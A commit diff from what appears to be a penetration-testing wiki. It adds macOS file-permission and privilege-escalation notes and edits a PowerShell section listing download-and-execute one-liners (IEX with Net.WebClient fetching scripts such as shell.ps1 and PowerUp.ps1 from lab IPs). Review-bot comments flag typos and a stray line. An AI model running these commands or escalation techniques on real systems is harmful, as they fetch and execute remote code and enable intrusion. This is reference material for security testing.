GITBOOK-3958: change request with no subject merged in GitBook

This commit is contained in:
CPol 2023-05-29 20:18:06 +00:00 committed by gitbook-bot
parent ffcdd1e35d
commit 2d9f506e60
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 37 additions and 1 deletion


@ -32,6 +32,42 @@ First of all, please note that **most of the tricks about privilege escalation a
## Basic MacOS
### Special File Permissions
#### Folder permissions
In a **folder**, **read** allows to **list it**, **write** allows to **delete** and **write** files on it, and **execute** allows to **traverse** the directory. So, for example, a user with **read permission over a file** inside a directory where he **doesn't have execute** permission **won't be able to read** the file.
#### Flag modifiers
There are some flags that could be set in the files that will make file behave differently. You can **check the flags** of the files inside a directory with `ls -lO /path/directory`
* **`uchg`**: Known as **uchange** flag will **prevent any action** changing or deleting the **file**. To set it do: `chflags uchg file.txt`
* The root user could **remove the flag** and modify the file
* **`restricted`**: This flag makes the file be **protected by SIP** (you cannot add this flag to a file).
* **`Sticky bit`**: If a directory with sticky bit, **only** the **directories owner or root can remane or delete** files. Typically this is set on the /tmp directory to prevent ordinary users from deleting or moving other users files.
#### ACLs
File **ACLs** contain **ACE** (Access Control Entries) where more **granular permissions** can be assigned to different users.
It's possible to grant a **directory** these permissions: `list`, `search`, `add_file`, `add_subdirectory`, `delete_child`, `delete_child`.\
Ans to a **file**: `read`, `write`, `append`, `execute`.
You can see the ACLs of file with `ls -le`: **`ls -le ~/Library`**
#### Privilege Escalation via File permissions
If a **process running as root writes** a file that can be controlled by a user, the user could abuse this to **escalate privileges**.\
This could occur in the following situations:
* File used was already created by a user (owned by the user)
* File used is writable by the user because of a group
* File used is inside a directory owned by the user (the user could create the file)
* File used is inside a directory owned by root but user has write access over it because of a group (the user could create the file)
Being able to **create a file** that is going to be **used by root**, allows a user to **take advantage of its content** or even create **symlinks/hardlinks** to point it to another place.
### OS X Specific Extensions
* **`.dmg`**: Apple Disk Image files are very frequent for installers.
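Review bot: the sticky-bit description under "Flag modifiers" is incomplete: when the sticky bit is set on a directory, a file inside it can be renamed or deleted by the file's owner as well as by the directory's owner and root, not only by the latter two, so the sentence should read "only the file's owner, the directory's owner or root can rename or delete files". Also in this hunk: "remane" should be "rename", "Ans to a **file**" should be "And to a **file**", and the directory ACL permission list names `delete_child` twice, so one of the two entries is most likely a copy-paste slip and should be checked against the permission that was actually intended.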


@ -33,7 +33,7 @@ Get-Command -Module <modulename>
## Download & Execute
```powershell
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
g
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
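Review bot: the line containing only `g`, between the first `IEX(New-Object Net.WebClient)` one-liner and the `echo IEX ...` line inside the powershell fence, looks like an accidental keystroke rather than a command (it is the single changed line this hunk introduces); it should be removed so the block stays a clean list of one-liners.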